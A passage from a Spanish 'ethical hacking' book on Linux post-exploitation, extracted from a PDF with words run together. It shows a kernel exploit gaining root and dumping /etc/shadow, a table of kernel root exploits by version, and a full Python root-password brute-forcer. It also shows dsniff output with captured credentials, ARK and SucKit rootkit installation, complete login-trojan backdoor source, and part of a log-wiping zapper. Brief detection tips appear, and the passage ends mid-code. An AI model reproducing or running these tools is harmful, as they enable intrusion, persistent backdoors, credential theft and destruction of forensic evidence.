bash-2.04$ gcc epcs2.c -o epcs2 - Lo compilagcc epcs2.c -o epcs2bash-2.04$ ./epcs2 - Lo ejecuta./epcs2execl: Operation not permittedptrace: PTRACE_GETREGS: No such processd0h! error!bash-2.04$ ./epcs2./epcs2 - Lo vuelve a ejecutar para que funcionebug exploited successfully.

240

Hacking Etico - [PDF Document] (244)

enjoy!cat /etc/shadow - Ya posee privilegios de root y puede ver elarchivo de contraseñas cifrado.

root:$1$NZAE03hh$t9bscNDCLpH/7z3zGnSsB0:11873:0:99999:7:-1:-1:0bin:*:11600:0:99999:7:::daemon:*:11600:0:99999:7:::adm:*:11600:0:99999:7:::lp:*:11600:0:99999:7:::sync:*:11600:0:99999:7:::shutdown:*:11600:0:99999:7:::halt:*:11600:0:99999:7:::mail:*:11600:0:99999:7:::news:*:11600:0:99999:7:::uucp:*:11600:0:99999:7:::operator:*:11600:0:99999:7:::games:*:11600:0:99999:7:::gopher:*:11600:0:99999:7:::

—8<

Recordemos que siempre hablamos de un intruso que tiende a pasar desapercibido. La for-ma más fácil de escalar privilegios, como vimos, es ejecutando un exploit local de kernel,y para ello tiene que saber de qué versión se trata éste. Para saberlo, ejecutará uname –a ouname –r y quizá intente ver las imágenes de arranque o su nombre (terminan usualmen-te con el número de kernel por ejemplo: vmlinuz-2.6.24-1-686). Otros comandos usualesson:

• dmesg | grep Linux• cat /etc/issue (por deduccion al dato que nos muestra sabremos cual es el kernel

por defecto que este traía)

241

Enigform y mod_openpgp son extensiones para Firefox y Apache respectivamente que agregan

un soporte OpenPGP para HTTP, orientado al Inicio Seguro de Sesiones Web y la firma digital de

solicitudes y respuestas HTTP. Creado por Arturo 'Buanzo' Busleiman, este proyecto cuenta con

el apoyo de Vinton Cerf y la organizacion OWASP. http://enigform.mozdev.org

Enigform (Sesiones webs seguras)

Hacking Etico - [PDF Document] (245)

• cat /proc/version• find / -name *2.6* o find / -name *2.4* etcétera

Una vez encontrada la versión correspondiente, intentará explotarla mediante un ex-ploit como los que puede encontrar en http://packs.by.ru/xploits/.

VERSIÓN EXPLOIT

2.4.17 newlocal, kmod, uselib242.4.18 brk, brk2, newlocal, kmod2.4.19 brk, brk2, newlocal, kmod2.4.20 ptrace, kmod, ptrace-k, brk, brk22.4.21 brk, brk2, ptrace, ptrace-kmod2.4.22 brk, brk2, ptrace, ptrace-kmod2.4.22-10 loginx2.4.23 mremap_pte2.4.24 mremap_pte, uselib242.4.25-1 uselib242.4.27 uselib242.6.2 mremap_pte, krad, h00lysh*t2.6.5 krad, krad2, h00lysh*t2.6.6 krad, krad2, h00lysh*t2.6.7 krad, krad2, h00lysh*t2.6.8 krad, krad2, h00lysh*t2.6.8-5 krad2, h00lysh*t2.6.9 krad, krad2, h00lysh*t2.6.9-34 r00t, h00lysh*t2.6.10 krad, krad2, h00lysh*t2.6.13 raptor, raptor2, h0llysh*t, prctl2.6.14 raptor, raptor2, h0llysh*t, prctl2.6.15 raptor, raptor2, h0llysh*t, prctl2.6.16 raptor, raptor2, h0llysh*t, prctl

Locales. Listado de exploit por versión de kernelque encontramos en http://packs.by.ru/xploits/kernel.txt.

El descuido humano es, quizás, uno de los principales responsables de un inciden-te amargo en cuanto a intrusión y, en este caso, es ejecutar mal un comando. Paracambiar de un usuario común a la cuenta root, los administradores deben escribirsu y presionar la tecla Enter. Algunos cometen el error de ejecutar su, seguido desu clave de root, teclear mal su, confundirse de consola, copiarla o escribirla y pre-sionar Enter. Aunque ese acto no significa nada por sí solo, todo ello queda graba-do en el archivo .bash_history de cada usuario del sistema (/home/usuario/.bash-

242

Hacking Etico - [PDF Document] (246)

_history), donde está el historial de los comandos ejecutados.El intruso, cuando entra en la Shell, buscará información acerca del sistema y deladministrador mirando el archivo .bash_history (quizá deshabilite la función deguardar el historial de comandos con unset HISTFILE apenas entra a menosque no sea necesario si entró por un backdoor que no deje trazas). Al hacerlo,sabrá instantáneamente cuáles son las habilidades del administrador o de eseusuario, y verá más objetivos de red, tareas cotidianas y todo lo que haya hecho conun simple cat .bash_history. A veces, el intruso encuentra en texto plano el passwordde root.

Veamos el interior de un .bash_history típico:

$ cd /home/admin - Entramos al path del usuario admin$ cat .bash_history - Vemos el contenido de .bash_historysu -lexitsu -lsu -lping 200.8.200.1ping 192.8.200.1suping www.cisco.comtopnslookuptopnslookupcd /etcpico -w resolv.confsu -lexittop

243

Una buena opción para mejorar la seguridad en nuestro sistema Linux es proteger elhistorial de comandos ingresados. En el documento que encontramos en www.defco-n1.org/secure-command.html, podemos ver cómo se pueden asegurar los archivos.bash_history para que no sean manipulados.

Proteger historial

Hacking Etico - [PDF Document] (247)

exitmailsusu rootsu - lsu -exitsu -exitsuexitsuexit&%#3s3dL$?KjfFD < Posible password de rootsuexitcd ..cdsuexitsuexitsu -su -supwdpwdcd ..ls -lcdpwdls -ltail mboxtail -100 mboxls -llsls -l

Claro que hay otras formas menos sutiles de dar con el password de root. Como

244

Hacking Etico - [PDF Document] (248)

ejemplo, podemos mencionar el siguiente script hecho en python, que hace bruteforce de modo local sobre la cuenta root:

#!/usr/bin/python#Local Root BruteForcer

#More Info:#http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571

#http://www.darkc0de.com#d3hydr8[at]gmail[dot]com

import systry:

import pexpectexcept(ImportError):

print “\nYou need the pexpect module.”print “http://www.noah.org/wiki/Pexpect\n”sys.exit(1)

#Change this if needed.LOGIN_ERROR = ‘su: incorrect password’

def brute(word):

print “Trying:”,wordchild = pexpect.spawn (‘su’)child.expect (‘Password: ‘)child.sendline (word)i = child.expect ([‘.+\s#\s’,LOGIN_ERROR])if i == 0:

print “\n\t[!] Root Password:”,wordchild.sendline (‘whoami’)print child.beforechild.interact()

#if i == 1:#print “Incorrect Password”

if len(sys.argv) != 2:print “\nUsage : ./rootbrute.py <wordlist>”

245

Hacking Etico - [PDF Document] (249)

print “Eg: ./rootbrute.py words.txt\n”sys.exit(1)

try:words = open(sys.argv[1], “r”).readlines()

except(IOError):print “\nError: Check your wordlist path\n”sys.exit(1)

print “\n[+] Loaded:”,len(words),”words”print “[+] BruteForcing...\n”for word in words:

brute(word.replace(“\n”,””))

Además de los descuidos humanos, un intruso también puede sacar provecho delas aplicaciones y cgis que se encuentren instalados, los archivos con el bit SUIDactivado (en determinadas versiones de plataformas), scripts olvidados con ciertospermisos de acción, documentos con información como dumpeos de databases entexto plano con permiso de lectura, entre otros.

Dsniff

Su creador, Dug Song, cuenta las partes que integran este kit (www.monkey.org/~dug-song/dsniff/) de la siguiente manera: “Dsniff es una colección de herramientas para audi-tar redes y realizar penetration testing. Está compuesta por dsniff, filesnarf, mailsnarf,msgsnarf, urlsnarf, y webspy, que pasivamente monitorean la red en busca de informacióninteresante (como passwords, e-mail, archivos, etcétera). Arpspoof, dnsspoof y macof fa-cilitan la intercepción de tráfico de red, normalmente no disponible para un atacante (porejemplo, switcheo de capa 2). sshmitm y webmitm implementan ataques activos man-in-the-middle contra sesiones SSH y Https redireccionadas, explotando débiles bindings enad-hoc PKI.”A continuación, veamos el output en pantalla de esta herramienta. El atacante, días

246

Características de archivos: http://nixshell.wordpress.com/2007/04/21/suid-shell-scripts-setting-the-sticky-bit/. AcercadechmodypermisosenLinux:http://catrip.wordpress.com/2007/12/18/chmod-permisos-en-li-nux/.TipsparaescalarprivilegiosenLinuxdemodofísicoylocal:http://hispabyte.net/wiki/index.php?title=Tu-torial_para_escalar_privilegios_en_sistemas_GNU/Linux.

Material adicional

Hacking Etico - [PDF Document] (250)

antes por la noche, ingresó al servidor de la universidad y dejó plantado dsniff pa-ra capturar contraseñas. Días después, ingresó en el servidor a través del backdoorpara ver qué había capturado este esnifer, y se encontró con lo siguiente:

bash# cd dsniff-2.3 - Entra al path del sniffer, oculto a la vistadel admin.

bash# ./dsniff -r log - Lo ejecuta en modo de ver lo capturado.

————————-02/04/08 10:33:39 tcp urbano.test.ejemplo.ar.1045 -> test.ejemplo

.edu.ar.110 (pop)USER josemaPASS jmaxomc3

————————-02/04/08 09:12:48 tcp celico.test.ejemplo.ar.1030 -> test.ejemplo

.edu.ar.110 (pop)USER vionnetPASS noel26494

————————-02/04/08 08:44:30 tcp 192.168.151.45.1047 -> test.ejemplo.edu.ar.139 (smb)PC5352

————————-

02/04/08 08:43:12 tcp 192.168.151.89.1100 -> l1.login.vip0.dcx.yahoo.com.80 (http)

GET /config/login?.tries=&.src=ym&.md5=&.hash=&.js=1&.last=&promo=&.intl=ar&.bypass

=&.partner=&.u=af5dvse4uu6l12&.v=0&.challenge=XiTSz7WHyGBUnjGiByIh6DqiTqCP&.yplus=&.

emailCode=&hasMsgr=0&.chkP=Y&.done=&login=pitufina_editado1&passwd=47f7027276f839931d4e1b

351881275f&.persistent=&.save=1&.hash=1&.md5=1 HTTP/1.1Host: login.yahoo.com

————————-02/04/08 04:23:09 tcp 200.22.216.201.63294 -> irc.ejemplo.com.ar.6667 (irc)USER sysadmin host servidor :master

247

Hacking Etico - [PDF Document] (251)

NICK ruben35JOIN #privado nullNICK ruben35

————————-02/04/08 01:40:39 tcp 168.33.34.1.1023 -> test.ejemplo.edu.ar.513 (rlogin)[root:root]

————————-02/04/08 01:35:00 udp ultrasparc.test.ejemplo.ar.52546 -> romon.test

.ejemplo.ar.161 (snmp)[version 1]public

————————-02/04/08 07:55:14 tcp test.ejemplo.edu.ar.2962 -> pin1.test.ejemplo

.ar.110 (pop)USER pichyPASS ofelio1508

————————-02/04/08 07:52:58 tcp mrmusculo.test.ejemplo.ar.1021 -> test.ejemplo

.edu.ar.513 (rlogin)[root:emiliano]

————————-

02/04/08 12:31:34 tcp mrmusculo.test.ejemplo.ar.1019 -> test.ejemplo.edu.ar.513 (rlogin)

[root:mvdelia]

————————-02/04/08 12:23:19 tcp 12.210.11.221.4615 -> test.ejemplo.edu.ar.23 (telnet)lpertovt767Lapompona————————-

02/04/08 07:55:10 tcp mrmusculo.test.ejemplo.ar.1019 -> test.ejemplo.edu.ar.513 (rlogin)

[root:pichy2]

248

Hacking Etico - [PDF Document] (252)

————————-02/04/08 08:25:24 tcp bud.test.ejemplo.ar.1039 -> test.ejemplo.edu.ar.110 (pop)USER mperezPASS 9dejulioal100

————————-02/04/08 09:01:28 tcp iel.test.ejemplo.ar.1027 -> test.ejemplo.edu.ar.110 (pop)USER flojcaPASS jcf578reghf

————————-02/04/08 08:11:02 tcp host15186.arnet.net.ar.1209 -> test.ejemplo

.edu.ar.110 (pop)USER mpittauPASS cosfura

————————-02/04/08 12:27:40 tcp 168-223-238-6.speedy.com.ar.1176 -> 200.22.107.44.21 (ftp)USER zeck0PASS xls9755zeee

————————-02/04/08 07:20:51 tcp mrmusculo.test.ejemplo.ar.1021 -> test.ejemplo

.edu.ar.513 (rlogin)[root:cmurti]

bash# ./dsniff -w log & - Recogido lo capturado, lo ponea andar nuevamente.

[1] 12360bash# dsniff: trigger_set_tcp: unknown decode: smtpdsniff: trigger_set_ip: unknown decode: pptpdsniff: trigger_set_ip: unknown decode: vrrpdsniff: trigger_set_tcp: unknown decode: smtpdsniff: trigger_set_tcp: unknown decode: ypservdsniff: listening on eth0 - Escuchando en eth0 (interfaz de red)

Como podemos ver, la información que captura es muy relevante. Ha logrado, des-de cada uno de los protocolos por los que ha pasado, una contraseña. Los muestrade modo ordenado y no duplicado como otros sniffers; es muy útil para auditar lasredes de una organización y así poder dar con las contraseñas o certificados de ac-ceso a la red. Como tips, podemos mencionar los siguientes:

249

Hacking Etico - [PDF Document] (253)

• Si el resultado de captura sale sucio con algún protocolo (por ejemplo, contrase-ñas vacías vía snmp o brute force de algún servicio por parte de un tercero), po-demos editarlo desde el archivo dsniff.services borrando ese puerto/servicio.

• Si no podemos compilar la herramienta dsniff en el servidor, es posible bajarla,descomprimirla, ingresar en el path y allí bajar un dsniff binario, previamentecompilado en otro servidor Linux. Le damos el nombre o privilegios que desee-mos y lo ejecutamos como queremos.

• Si necesitamos esnifear un servicio que está en un puerto diferente, por ejemplo, un servi-dor que tiene el servicio Telnet escuchando en el puerto 7, para no complicarnos demasia-do tenemos que editardsniff.services y, en donde dice 23, colocar 7. Lomismo debemoshacer en caso de que sea otro protocolo el que corra por otro lugar. Por esto es muy im-portante reconocer, con nmap, los 65365 puertos del servidor objetivo y, aquellos puertosque aparezcan comodesconocidos, probarlos y reconocerlos uno a uno telneteando ama-no o intentando descubrir qué clase y servicio es, con la ultima versión de la herramientaAmap.

Detectar. Las soluciones (mitigación) para estetipo de ataque o técnica podemos encontrarlas en el final

del FAQ de la herramienta (www.monkey.org/~dugsong/dsniff/faq.html).

250

Hacking Etico - [PDF Document] (254)

Troyanizar comandos y servicios

Ahora veremos dos ejemplos, con salida de pantalla para ser más específicos y cla-ros, sobre cómo un intruso instala binarios troyanizados de comandos o serviciosen un servidor Linux con el fin de pasar desapercibido.

Ejemplo

Uno de los rootkits (http://packetstormsecurity.org/UNIX/penetration/rootkits/)más clásicos es el ARK, que ha sido utilizado por años por intrusos para reemplazarlos originales de la plataforma Linux. Veamos cómo el intruso instala este rootkit unavez que logró privilegios de root:

wget http://packetstormsecurity.org/UNIX/penetration/rootkits/ark-1.0.1.tar.gz—16:08:35— http://packetstormsecurity.org/UNIX/penetration/rootkits

/ark-1.0.1.tar.gz=> `ark-1.0.1.tar.gz’

Connecting to packetstormsecurity.org:80... connected!HTTP request sent, awaiting response... 200 OKLength: 526,758 [application/x-tar]

0K .......... .......... .......... .......... .......... 9% 0:11 42.0K50K .......... .......... .......... .......... .......... 19% 0:02 197K

100K .......... .......... .......... .......... .......... 29% 0:03 105K150K .......... .......... .......... .......... .......... 38% 0:03 105K200K .......... .......... .......... .......... .......... 48% 0:02 108K250K .......... .......... .......... .......... .......... 58% 0:01 185K300K .......... .......... .......... .......... .......... 68% 0:01 109K350K .......... .......... .......... .......... .......... 77% 0:00 150K400K .......... .......... .......... .......... .......... 87% 0:00 128K450K .......... .......... .......... .......... .......... 97% 0:00 107K500K .......... .... 100% 0:00 547K

16:29:38 (104.49 KB/s) - `ark-1.0.1.tar.gz’ saved [526758/526758]

tar xvzf ark-1.0.1.tar.gz - Descomprime el archivoark-1.0.1/ark-1.0.1/READMEark-1.0.1/arkark-1.0.1/compile

251

Hacking Etico - [PDF Document] (255)

ark-1.0.1/duark-1.0.1/killallark-1.0.1/login-normalark-1.0.1/login-shadowark-1.0.1/lsark-1.0.1/netstatark-1.0.1/psark-1.0.1/pstreeark-1.0.1/sshdark-1.0.1/syslogdark-1.0.1/topark-1.0.1/VERSION

cd ark-1.0.1 - Entra al directorio del rootkitcp ls /bin/ls - Reemplaza ls troyanizado por el originalcp ps /bin/ps - Reemplaza ps troyanizado por el originalcp netstat /bin/netstat - Reemplaza netstat troyanizado por el originalcp killall /bin/killall - Reemplaza killall troyanizado por el originaltouch -r witch /bin/ls - Asigna a ls troyanizado, la fecha y hora decreacion del comando with (original) para borrar huella de manipulacion.touch -r witch /bin/ps - Asigna a ps troyanizado, la fecha y hora decreacion del comando witch (original) para borrar huella de manipulacion.touch -r witch /bin/netstat - Asigna a netstat troyanizado, la fechay hora decreacion del comando witch (original) para borrar huella de manipulacion.touch -r witch /bin/killall - Asigna a killall troyanizado,

la fecha y hora decreacion del comando witch (original) para borrar huella de manipulacion.mkdir /dev/ptyxx - Crea el path predeterminado de configuracion del rootkitcd /dev/ptyxx - Entra en el path del rootkit

El rootkit funciona de la siguiente manera: dice que aquellos datos que se ingresenen .proc se ocultarán como procesos, los colocados en .file serán ocultados comodirectorios y archivos, y los colocados en .addr serán invisibles como direccionesconectadas hacia dentro o hacia fuera del servidor.

echo 2 script-maligno >.proc - El intruso oculta proceso de scriptecho 2 backdoor >>.proc - El intruso oculta proceso de backdoorecho 2 esnifer >>.proc - El intruso oculta proceso de esnifer

252

Hacking Etico - [PDF Document] (256)

echo 2 tool >>.proc - El intruso oculta proceso de exploit o escanerecho 2 wipe >>.proc - El intruso oculta proceso de herramienta deborrado seguro

echo ptyxx >.file - El intruso oculta el directorio del rootkitecho .proc >>.file - El intruso oculta el archivo del rootkitecho .file >>.file - El intruso oculta el archivo del rootkitecho .addr >>.file - El intruso oculta el archivo del rootkitecho dsniff-2.3 >>.file - El intruso oculta el directorio del esniferecho 2 200 >.addr - El intruso oculta direcciones IP provenientes

de un rango que comienza en 200.echo 2 192 >>.addr - El intruso oculta direcciones IP provenientes

de un rango que comienza en 192.

Cuando el administrador ejecute ls, ps, netstat o killall, estos comandos respon-derán siempre a esos archivos de configuración, ya que no seran loscomandos originales del sistema, sino: archivos binarios troyanizados.Esta técnica puede descubrirse de las siguientes maneras:

• Chequeando la integridad (md5 checksum) con los binarios originales.• Monitoreando el cambio con una aplicación para tal fin, como Tripwire (http://

sourceforge.net/projects/tripwire) o AIDE (http://sourceforge.net/projects/aide).• Con cron (http://es.wikipedia.org/wiki/Cron_(unix)) y un script que nos avise

por e-mail de algún cambio.• Con herramientas y técnicas forenses.• Con un escáner de rootkits como chrootkit (www.chkrootkit.org) o Rootkit

Hunter (www.rootkit.nl/projects/rootkit_hunter.html).Si nuestro servidor fue comprometido, la recomendación es analizar si se va a lle-var a cabo alguna investigación interna (análisis forense) y, en caso negativo, insta-larlo de cero, aplicar herdening y administración dedicada. Si se va a realizar la in-vestigación interna, hay que tomar todas las precauciones, siguiendo el protocoloforense de adquisición de imágenes y preservación de evidencia a través de un pro-fesional. Recordemos que cualquier comando Linux puede ser troyanizado (lsof,login, etc), tal como los servicios e, incluso, el mismo kernel.

Ejemplo de troyanizado de servicio (login)

En este ejemplo, veremos cómo al troyanizar un archivo binario de Linux (login)se transforma, a través de un servicio abierto como Telnet, en un backdoor. Paraeso, el intruso podría utilizar el famoso ulogin.c:

253

Hacking Etico - [PDF Document] (257)

/** PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!

* Universal login trojan by Tragedy/Dor* Email: [emailprotected]* IRC: [Dor]@ircnet** Login trojan for pretty much any O/S...* Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7* OSF1/DGUX4.0,* Known not to work on:* SunOS 4.x and 5.4... Seems the only variable passwd to login* on these versions of SunOS is the $TERM... and its passed via* commandline option... should be easy to work round in time** #define PASSWORD - Set your password here* #define _PATH_LOGIN - This is where you moved the original

login to* login to hacked host with...* from bourne shell (sh, bash) sh DISPLAY=”your pass”;export DISPLAY;

telnet host**/

#include <stdio.h>#if !defined(PASSWORD)#define PASSWORD “gt4rvdumyu”#endif#if !defined(_PATH_LOGIN)# define _PATH_LOGIN “/bin/login”#endif

main (argc, argv, envp)int argc;char **argv, **envp;{char *display = getenv(“DISPLAY”);

if ( display == NULL ) {execve(_PATH_LOGIN, argv, envp);

254

Hacking Etico - [PDF Document] (258)

perror(_PATH_LOGIN);exit(1);

}

if (!strcmp(display,PASSWORD)) {system(“/bin/sh”);

exit(1);}

execve(_PATH_LOGIN, argv, envp);exit(1);

}

Con ulogin.c podría llevar a cabo lo siguiente:

root@lab:/tmp# wget http://packetstormsecurity.org/UNIX/penetration/rootkits/ulogin.c - El intruso baja a la maquina objetivoel fuente del binario troyanizado

—03:24:38— http://packetstormsecurity.org/UNIX/penetration/rootkits/ulogin.c => `ulogin.c’

Connecting to packetstormsecurity.org:80... connected!HTTP request sent, awaiting response... 200 OKLength: 1,179 [text/plain]

0K -> .[100%]

03:24:39 (127.93 KB/s) - `ulogin.c’ saved [1179/1179]

root@lab2:/tmp# gcc ulogin.c -o login- Lo compilaroot@lab2:/tmp# wipe ulogin.c- Borra de modo seguro el codigo fuenteroot@lab2:/tmp# cp /bin/login /usr/lib/login- Hace una copia del login originalroot@lab2:/tmp# chmod 755 /usr/lib/login- Le asigna permisos

255

Hacking Etico - [PDF Document] (259)

root@lab2:/tmp# cp login /bin/login- Ubica el binario troyanizado en lugar del originalroot@lab2:/tmp# chmod 4755 /bin/login- Le asigna permisos

root@lab1:# export DISPLAY=”gt4rvdumyu”; telnet 192.168.0.44- Desde otra maquina se loguea a traves del backdoorTrying 192.168.0.44... (esta maquina tiene el servicio telnet corriendo

en el puerto 23 por defecto)Connected to 192.168.0.44.Escape character is ‘^]’.$Id: Localcore 2008/08/14 21:31:00 marekm Exp $sh-2.04# - El intruso ya esta adentro del objetivo como root,

sin dejar rastros.

sh-2.04# exit

Connection closed by foreign host.

Instalación de un backdoor

Como un profesional tiene que conocer todas las técnicas y herramientas que utilizan losatacantes, analizaremos una de las más sofisticadas utilidades de backdooring que se die-ron a conocer al público: SucKit (http://packetstormsecurity.org/UNIX/penetration-/rootkits/sk-1.3a.tar.gz). Veamos cómo luce la instalación de SucKit en un servidor Linux.

root@lab2:/tmp# cd sk-1.3a - Ingresamos a su directorioroot@lab2:/tmp/sk-1.3a# make skconfig - Comenzamos con su compilacionrm -f include/config.h sk login instmake[1]: Entering directory `/tmp/sk-1.3a/src’make[1]: Leaving directory `/tmp/sk-1.3a/src’make[1]: Entering directory `/tmp/sk-1.3a/src’gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o pass

256

Hacking Etico - [PDF Document] (260)

make[1]: Leaving directory `/tmp/sk-1.3a/src’[===== SucKIT version 1.3a, Nov 28 2003 <http://sd.g-art.nl/sk> =====][====== (c)oded by sd <[emailprotected]> & devik <[emailprotected]>, 2002 ======]Please enter new rootkit password: - Asignamos el password parasetearlo en la parte servidor, ya que al conectarnos con el cliente (comovimos en el capitulo anterior) nos lo pedirá, y confirmamos.

Again, just to be sure:OK, new password set.Home directory [/usr/share/locale/sk/.sk12]:Magic file-hiding suffix [sk12]:

Configuration saved.From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.

To (re)build all of stuff type ‘make’root@lab2:/tmp/sk-1.3a# makemake[1]: Entering directory `/tmp/sk-1.3a/src’gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/tmp/sk-1.3a/src’make[3]: Entering directory `/tmp/sk-1.3a/src’gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE “\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version” >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c patte

257

Hacking Etico - [PDF Document] (261)

rn.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/tmp/sk-1.3a/src’gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/tmp/sk-1.3a/src’make[1]: Leaving directory `/tmp/sk-1.3a/src’make[1]: Entering directory `/tmp/sk-1.3a/src’gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/tmp/sk-1.3a/src’cp -f src/login logincp -f src/sk skCreating install scriptecho “#!/bin/bash” > instecho “D=`cat include/config.h | grep HOME | awk {‘print $3’}`” >> instecho “H=`cat include/config.h | grep HIDESTR | awk {‘print $3’}`” >> instecho “mkdir -p \$D; cd \$D” >> instecho “echo > .sniffer; chmod 0622 .sniffer” >> instecho “echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk” >> instecho “chmod 0755 sk; if [ ! -f /sbin/init\${H} ]; “ \

“then cp -f /sbin/init /sbin/init\${H}; fi;” \“rm -f /sbin/init; cp sk /sbin/init” >> inst

Okay, file ‘inst’ is complete, self-installing script.Just upload it somewhere, execute and you could log in using./login binary.

Have fun!

root@lab2:/tmp/sk-1.3a# ./sk - Se ejecuta el servidor en el objetivo

258

GDB es un depurador (debugger), muy util a la hora de ver donde falla un programa (empleandolo

en tecnicas de ingenieria inversa es increiblemente eficaz) en tiempo de ejecución o desde un

archivo generado (volcado) del crash de una aplicacion. Su sitio es: www.sourceware.org/gdb/

Sourceware.org/gdb/

Hacking Etico - [PDF Document] (262)

[===== SucKIT version 1.3a, Nov 28 2003 <http://sd.g-art.nl/sk> =====][====== (c)oded by sd <[emailprotected]> & devik <[emailprotected]>, 2002 ======]RK_Init: idt=0xc0233000, sct[]=0xc01ea700, kmalloc()=0xc0126e70, gfp=0x1f0

Z_Init: Allocating kernel-code memory...Done, 13182 bytes, base=0xc1450000

BD_Init: Starting backdoor daemon...Done, pid=24247

En caso de que no compile correctamente, se puede intentar compilar en otro ser-vidor y subir ese server binario (o compilado, llamado sk) al servidor, que funcio-nará sin problemas.Recordemos que el servidor objetivo se loguea con el cliente SucKit generado tambiénallí mismo (binario llamado login en el mismo path), junto al server del backdoor.La shell atacante loguea desde el cliente: ./login ip (+password del server), haciala shell objetivo con sk instalado.

Borrado de rastros

Como ya comentamos, una de las acciones más comunes de un intruso es tratar de bo-rrar el rastro que dejó en su intrusión. Por eso, si aún no conocemos el sistema de archi-vos o registros de Linux que se encuentra en el directorio /var/log o /var/run, es muyimportante que leamos los siguientes textos para comprender exactamente de que se tra-ta:

• Comentarios generales: www.estrellateyarde.es/so/logs-en-linux.• Características de los logs: www.psicofxp.com/forums/info-y-manua-

les.153/145356-logs-en-linux.html.• Limpieza en Debian: http://laguaridadelmal.blogspot.com/2007_11_01_archi-

ve.html.

Más alla de éstos, existen otros registros como los logs del webserver Apache omotores de base de datos. También existen diversos sistemas de gestionarlos, ya sealocalmente (asignándoles un path especial con permisos especiales: chattr +a archi-vo) o remotamente, alojando los registros o logs en otro servidor de la red.Ahora bien, el intruso puede borrar sus rastros de muchas formas. La más grotes-ca es haciendo un simple rm –rf /var/log, ya que así podrían ser recuperados fá-cilmente con técnicas forenses simples. Diferente sería si utilizara una herramientade borrado seguro como wipe (http://wipe.sourceforge.net), pero así despertaríalas sospechas del administrador. Podría hacerlo de manera más sutil si programara

259

Hacking Etico - [PDF Document] (263)

un zapper adecuado al objetivo y al modo de gestionar registros que existe en elservidor (que puede no estar por defecto). A su vez, debería borrar todos los logsque éste modificara tras su paso y sólo eliminar las entradas que corresponden a di-chas sesiones. Ni más ni menos, que contemple los usuarios utilizados localmentey los intentos previos externos. Aun así, si es detallista, deberá retocar a mano al-gunos archivos con datos de creación o modificación falsos.

Registros. Archivos de logs en la particion deDebian 4.0 vistos desde Windows.

Estos scripts son llamados zappers y resultan muy útiles al modificar automática-mente los logs que se encuentran en el sistema de modo binario y los que están entexto plano. Veamos, como ejemplo, el código fuente de zap2.c, que sólo saca lastrazas de un usuario en utmp, wtmp y lastlog.

/*=============================================================================UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSDThe Shadow Penguin Security (http://shadowpenguin.backsection.net)Written by UNYUN ([emailprotected])

=============================================================================*/

260

Hacking Etico - [PDF Document] (264)

#include <stdio.h>#include <fcntl.h>#include <unistd.h>#include <utmp.h>

#ifdef UTMAXTYPE#define UTMPX

#include <utmpx.h>#endif#include <pwd.h>#ifndef _PATH_LASTLOG#include <lastlog.h>#endif#include <sys/types.h>#include <sys/stat.h>#include <sys/utsname.h>

#define SVR4_UTMP “/var/adm/utmp”#define SVR4_WTMP “/var/adm/wtmp”#define SVR4_LASTLOG “/var/adm/lastlog”

#define SUNOS4_UTMP “/etc/utmp”#define SUNOS4_WTMP “/usr/adm/wtmp”#define SUNOS4_LASTLOG “/usr/adm/lastlog”

#define BSD_UTMP “/var/run/utmp”#define BSD_WTMP “/var/log/wtmp”#define BSD_LASTLOG “/var/log/lastlog”

#define MAX_FPATH 512

int wipe_log(path,user,type)char *path,*user;int type;{

struct utmp utmp_ent;#ifdef UTMPX

struct utmpx utmpx_ent;#endif

261

Hacking Etico - [PDF Document] (265)

void *ent;char *un;int sz,fd,c=0;

if (strlen(path)==0) return(1);

if (type==0){ent=(void *)&utmp_ent;

#ifdef UTMPXun=(char *)&utmp_ent.ut_user;

#elseun=(char *)&utmp_ent.ut_name;

#endifsz=sizeof(struct utmp);

}else{#ifdef UTMPX

ent=(void *)&utmpx_ent;un=(char *)&utmpx_ent.ut_user;sz=sizeof(struct utmpx);

#endif}if ((fd=open(path,O_RDWR))<=0) return(-1);while(read(fd,ent,sz)>0)

if (!strncmp(un,user,strlen(user))){memset(ent,0,sz);lseek(fd,-sz,SEEK_CUR);write(fd,ent,sz);c++;

}close(fd);printf(“Wiped %d entries of %s from %s.\n”,c,user,path);return(0);

}

int wipe_lastlog(path,user,type)char *path,*user;int type;{

struct passwd *p;

262

Hacking Etico - [PDF Document] (266)

struct lastlog ent;int fd;char buffer[MAX_FPATH];

if (type==0) strcpy(buffer,path);else sprintf(buffer,”%s/%s”,path,user);

memset(&ent,0,sizeof(struct lastlog));if ((p=getpwnam(user))==NULL) return(-1);if ((fd=open(buffer,O_RDWR))<=0) return(-2);if (type==0)

